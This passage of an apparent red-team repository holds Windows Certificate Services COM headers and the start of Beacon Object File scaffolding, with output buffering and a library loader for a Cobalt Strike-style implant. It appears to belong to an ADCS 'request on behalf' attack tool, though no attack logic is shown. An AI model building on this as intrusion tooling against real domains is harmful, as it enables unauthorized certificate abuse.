// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_PENDINFOTOKEN           8  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_PENDINFOTIME            9  // Date, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ISSUEDCERTIFICATEHASH  10  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ISSUEDCERTIFICATE      11  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ISSUEDCERTIFICATECHAIN 12  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ISSUEDCERTIFICATECRLCHAIN 13  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ENCRYPTEDKEYHASH	  14  // Binary, Indexed

#define FR_PROP_FULLRESPONSENOPKCS7	  15  // Binary

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_CAEXCHANGECERTIFICATEHASH	  16  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_CAEXCHANGECERTIFICATE	  17  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_CAEXCHANGECERTIFICATECHAIN	  18  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_CAEXCHANGECERTIFICATECRLCHAIN  19  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ATTESTATIONCHALLENGE		  20  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ATTESTATIONPROVIDERNAME	  21  // Binary, Indexed

// FR_PROP_CLAIMCHALLENGE:
#define FR_PROP_CLAIMCHALLENGE		  22  // Long

EXTERN_C const IID LIBID_CERTCLILib;

EXTERN_C const CLSID CLSID_CCertGetConfig;

#ifdef __cplusplus

class DECLSPEC_UUID("c6cc49b0-ce17-11d0-8833-00a0c903b83c")
CCertGetConfig;
#endif

EXTERN_C const CLSID CLSID_CCertConfig;

#ifdef __cplusplus

class DECLSPEC_UUID("372fce38-4324-11d0-8810-00a0c903b83c")
CCertConfig;
#endif

EXTERN_C const CLSID CLSID_CCertRequest;

#ifdef __cplusplus

class DECLSPEC_UUID("98aff3f0-5524-11d0-8812-00a0c903b83c")
CCertRequest;
#endif

EXTERN_C const CLSID CLSID_CCertServerPolicy;

#ifdef __cplusplus

class DECLSPEC_UUID("aa000926-ffbe-11cf-8800-00a0c903b83c")
CCertServerPolicy;
#endif

EXTERN_C const CLSID CLSID_CCertServerExit;

#ifdef __cplusplus

class DECLSPEC_UUID("4c4a5e40-732c-11d0-8816-00a0c903b83c")
CCertServerExit;
#endif
#endif /* __CERTCLILib_LIBRARY_DEFINED__ */

/* interface __MIDL_itf_certcli_0000_0007 */
/* [local] */ 

#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
#pragma endregion


extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0007_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0007_v0_0_s_ifspec;

/* Additional Prototypes for ALL interfaces */

unsigned long             __RPC_USER  BSTR_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  VARIANT_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out VARIANT * ); 
void                      __RPC_USER  VARIANT_UserFree(     __RPC__in unsigned long *, __RPC__in VARIANT * ); 

unsigned long             __RPC_USER  BSTR_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree64(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  VARIANT_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out VARIANT * ); 
void                      __RPC_USER  VARIANT_UserFree64(     __RPC__in unsigned long *, __RPC__in VARIANT * ); 

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif




================================================
FILE: AD-BOF/ADCS-BOF/src/request_on_behalf/CertPol.h
================================================


/* this ALWAYS GENERATED file contains the definitions for the interfaces */


 /* File created by MIDL compiler version 8.01.0622 */
/* @@MIDL_FILE_HEADING(  ) */



/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

/* verify that the <rpcsal.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCSAL_H_VERSION__
#define __REQUIRED_RPCSAL_H_VERSION__ 100
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */

#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/

#ifndef __certpol_h__
#define __certpol_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */ 

#ifndef __ICertPolicy_FWD_DEFINED__
#define __ICertPolicy_FWD_DEFINED__
typedef interface ICertPolicy ICertPolicy;

#endif 	/* __ICertPolicy_FWD_DEFINED__ */


#ifndef __ICertPolicy2_FWD_DEFINED__
#define __ICertPolicy2_FWD_DEFINED__
typedef interface ICertPolicy2 ICertPolicy2;

#endif 	/* __ICertPolicy2_FWD_DEFINED__ */


#ifndef __INDESPolicy_FWD_DEFINED__
#define __INDESPolicy_FWD_DEFINED__
typedef interface INDESPolicy INDESPolicy;

#endif 	/* __INDESPolicy_FWD_DEFINED__ */


/* header files for imported files */
#include "wtypes.h"
#include "certmod.h"
#include "certbase.h"
#include "certbcli.h"

#ifdef __cplusplus
extern "C"{
#endif 


/* interface __MIDL_itf_certpol_0000_0000 */
/* [local] */ 

#include <winapifamily.h>
#pragma region Desktop Family
#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)


extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0000_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0000_v0_0_s_ifspec;

#ifndef __ICertPolicy_INTERFACE_DEFINED__
#define __ICertPolicy_INTERFACE_DEFINED__

/* interface ICertPolicy */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPolicy;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("38bb5a00-7636-11d0-b413-00a0c91bbf8c")
    ICertPolicy : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in const BSTR strConfig) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE VerifyRequest( 
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Context,
            /* [in] */ LONG bNewRequest,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out LONG *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetDescription( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDescription) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ShutDown( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPolicyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPolicy * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPolicy * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPolicy * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPolicy * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPolicy * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPolicy * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPolicy * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPolicy * This,
            /* [in] */ __RPC__in const BSTR strConfig);
        
        HRESULT ( STDMETHODCALLTYPE *VerifyRequest )( 
            __RPC__in ICertPolicy * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Context,
            /* [in] */ LONG bNewRequest,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetDescription )( 
            __RPC__in ICertPolicy * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDescription);
        
        HRESULT ( STDMETHODCALLTYPE *ShutDown )( 
            __RPC__in ICertPolicy * This);
        
        END_INTERFACE
    } ICertPolicyVtbl;

    interface ICertPolicy
    {
        CONST_VTBL struct ICertPolicyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPolicy_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPolicy_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPolicy_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPolicy_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPolicy_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPolicy_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPolicy_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPolicy_Initialize(This,strConfig)	\
    ( (This)->lpVtbl -> Initialize(This,strConfig) ) 

#define ICertPolicy_VerifyRequest(This,strConfig,Context,bNewRequest,Flags,pDisposition)	\
    ( (This)->lpVtbl -> VerifyRequest(This,strConfig,Context,bNewRequest,Flags,pDisposition) ) 

#define ICertPolicy_GetDescription(This,pstrDescription)	\
    ( (This)->lpVtbl -> GetDescription(This,pstrDescription) ) 

#define ICertPolicy_ShutDown(This)	\
    ( (This)->lpVtbl -> ShutDown(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPolicy_INTERFACE_DEFINED__ */


#ifndef __ICertPolicy2_INTERFACE_DEFINED__
#define __ICertPolicy2_INTERFACE_DEFINED__

/* interface ICertPolicy2 */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPolicy2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("3db4910e-8001-4bf1-aa1b-f43a808317a0")
    ICertPolicy2 : public ICertPolicy
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE GetManageModule( 
            /* [retval][out] */ __RPC__deref_out_opt ICertManageModule **ppManageModule) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPolicy2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPolicy2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPolicy2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPolicy2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPolicy2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPolicy2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPolicy2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPolicy2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPolicy2 * This,
            /* [in] */ __RPC__in const BSTR strConfig);
        
        HRESULT ( STDMETHODCALLTYPE *VerifyRequest )( 
            __RPC__in ICertPolicy2 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Context,
            /* [in] */ LONG bNewRequest,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetDescription )( 
            __RPC__in ICertPolicy2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDescription);
        
        HRESULT ( STDMETHODCALLTYPE *ShutDown )( 
            __RPC__in ICertPolicy2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetManageModule )( 
            __RPC__in ICertPolicy2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICertManageModule **ppManageModule);
        
        END_INTERFACE
    } ICertPolicy2Vtbl;

    interface ICertPolicy2
    {
        CONST_VTBL struct ICertPolicy2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPolicy2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPolicy2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPolicy2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPolicy2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPolicy2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPolicy2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPolicy2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPolicy2_Initialize(This,strConfig)	\
    ( (This)->lpVtbl -> Initialize(This,strConfig) ) 

#define ICertPolicy2_VerifyRequest(This,strConfig,Context,bNewRequest,Flags,pDisposition)	\
    ( (This)->lpVtbl -> VerifyRequest(This,strConfig,Context,bNewRequest,Flags,pDisposition) ) 

#define ICertPolicy2_GetDescription(This,pstrDescription)	\
    ( (This)->lpVtbl -> GetDescription(This,pstrDescription) ) 

#define ICertPolicy2_ShutDown(This)	\
    ( (This)->lpVtbl -> ShutDown(This) ) 


#define ICertPolicy2_GetManageModule(This,ppManageModule)	\
    ( (This)->lpVtbl -> GetManageModule(This,ppManageModule) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPolicy2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certpol_0000_0002 */
/* [local] */ 

typedef 
enum X509SCEPMessageType
    {
        SCEPMessageUnknown	= -1,
        SCEPMessageCertResponse	= 3,
        SCEPMessagePKCSRequest	= 19,
        SCEPMessageGetCertInitial	= 20,
        SCEPMessageGetCert	= 21,
        SCEPMessageGetCRL	= 22,
        SCEPMessageClaimChallengeAnswer	= 41
    } 	X509SCEPMessageType;

typedef 
enum X509SCEPDisposition
    {
        SCEPDispositionUnknown	= -1,
        SCEPDispositionSuccess	= 0,
        SCEPDispositionFailure	= 2,
        SCEPDispositionPending	= 3,
        SCEPDispositionPendingChallenge	= 11
    } 	X509SCEPDisposition;

typedef 
enum X509SCEPFailInfo
    {
        SCEPFailUnknown	= -1,
        SCEPFailBadAlgorithm	= 0,
        SCEPFailBadMessageCheck	= 1,
        SCEPFailBadRequest	= 2,
        SCEPFailBadTime	= 3,
        SCEPFailBadCertId	= 4
    } 	X509SCEPFailInfo;



extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0002_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0002_v0_0_s_ifspec;

#ifndef __INDESPolicy_INTERFACE_DEFINED__
#define __INDESPolicy_INTERFACE_DEFINED__

/* interface INDESPolicy */
/* [local][helpstring][uuid][object] */ 


EXTERN_C const IID IID_INDESPolicy;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("13CA515D-431D-46CC-8C2E-1DA269BBD625")
    INDESPolicy : public IUnknown
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Uninitialize( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GenerateChallenge( 
            /* [ref][in] */ PCWSTR pwszTemplate,
            /* [ref][in] */ PCWSTR pwszParams,
            /* [retval][out] */ PWSTR *ppwszResponse) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE VerifyRequest( 
            /* [ref][in] */ CERTTRANSBLOB *pctbRequest,
            /* [ref][in] */ CERTTRANSBLOB *pctbSigningCertEncoded,
            /* [ref][in] */ PCWSTR pwszTemplate,
            /* [ref][in] */ PCWSTR pwszTransactionId,
            /* [retval][out] */ BOOL *pfVerified) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Notify( 
            /* [ref][in] */ PCWSTR pwszChallenge,
            /* [ref][in] */ PCWSTR pwszTransactionId,
            /* [in] */ X509SCEPDisposition disposition,
            /* [in] */ LONG lastHResult,
            /* [ref][in] */ CERTTRANSBLOB *pctbIssuedCertEncoded) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct INDESPolicyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            INDESPolicy * This,
            /* [in] */ REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            INDESPolicy * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            INDESPolicy * This);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            INDESPolicy * This);
        
        HRESULT ( STDMETHODCALLTYPE *Uninitialize )( 
            INDESPolicy * This);
        
        HRESULT ( STDMETHODCALLTYPE *GenerateChallenge )( 
            INDESPolicy * This,
            /* [ref][in] */ PCWSTR pwszTemplate,
            /* [ref][in] */ PCWSTR pwszParams,
            /* [retval][out] */ PWSTR *ppwszResponse);
        
        HRESULT ( STDMETHODCALLTYPE *VerifyRequest )( 
            INDESPolicy * This,
            /* [ref][in] */ CERTTRANSBLOB *pctbRequest,
            /* [ref][in] */ CERTTRANSBLOB *pctbSigningCertEncoded,
            /* [ref][in] */ PCWSTR pwszTemplate,
            /* [ref][in] */ PCWSTR pwszTransactionId,
            /* [retval][out] */ BOOL *pfVerified);
        
        HRESULT ( STDMETHODCALLTYPE *Notify )( 
            INDESPolicy * This,
            /* [ref][in] */ PCWSTR pwszChallenge,
            /* [ref][in] */ PCWSTR pwszTransactionId,
            /* [in] */ X509SCEPDisposition disposition,
            /* [in] */ LONG lastHResult,
            /* [ref][in] */ CERTTRANSBLOB *pctbIssuedCertEncoded);
        
        END_INTERFACE
    } INDESPolicyVtbl;

    interface INDESPolicy
    {
        CONST_VTBL struct INDESPolicyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define INDESPolicy_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define INDESPolicy_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define INDESPolicy_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define INDESPolicy_Initialize(This)	\
    ( (This)->lpVtbl -> Initialize(This) ) 

#define INDESPolicy_Uninitialize(This)	\
    ( (This)->lpVtbl -> Uninitialize(This) ) 

#define INDESPolicy_GenerateChallenge(This,pwszTemplate,pwszParams,ppwszResponse)	\
    ( (This)->lpVtbl -> GenerateChallenge(This,pwszTemplate,pwszParams,ppwszResponse) ) 

#define INDESPolicy_VerifyRequest(This,pctbRequest,pctbSigningCertEncoded,pwszTemplate,pwszTransactionId,pfVerified)	\
    ( (This)->lpVtbl -> VerifyRequest(This,pctbRequest,pctbSigningCertEncoded,pwszTemplate,pwszTransactionId,pfVerified) ) 

#define INDESPolicy_Notify(This,pwszChallenge,pwszTransactionId,disposition,lastHResult,pctbIssuedCertEncoded)	\
    ( (This)->lpVtbl -> Notify(This,pwszChallenge,pwszTransactionId,disposition,lastHResult,pctbIssuedCertEncoded) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __INDESPolicy_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certpol_0000_0003 */
/* [local] */ 

#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
#pragma endregion


extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0003_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0003_v0_0_s_ifspec;

/* Additional Prototypes for ALL interfaces */

unsigned long             __RPC_USER  BSTR_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  BSTR_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree64(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif




================================================
FILE: AD-BOF/ADCS-BOF/src/request_on_behalf/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif

//#pragma GCC diagnostic ignored "-Wint-conversion"
//formatp output = {1}; // this is just done so its we don't go into .bss which isn't handled properly
char * output = (char*)1;
WORD currentoutsize = 1;
HANDLE trash = (HANDLE)1; // Needed for x64 to not give relocation error
//#pragma GCC diagnostic pop

int bofstart();
#ifdef BOF
void internal_printf(const char* format, ...);
#endif
char * Utf16ToUtf8(const wchar_t* input);
wchar_t * Utf8ToUtf16(const char * input);
void printoutput(BOOL done);
void bofstop();

#ifdef BOF
int bofstart()
{   
    //output.original=NULL;
    //handle any global initilization here
    //BeaconFormatAlloc(&output, bufsize+256);
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;

}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    char* transferBuffer = (char*)intAlloc(bufsize);
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            int transfersize = 0;
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            //BeaconFormatPrintf(&output, transferBuffer); // copy it to cobalt strikes output buffer
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{
    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}
#endif

#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

//GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary are gimmie functions
//
// DynamicLoad
// Retrieves a function pointer given the BOF library-function name
// szLibrary           - The library containing the function you want to load
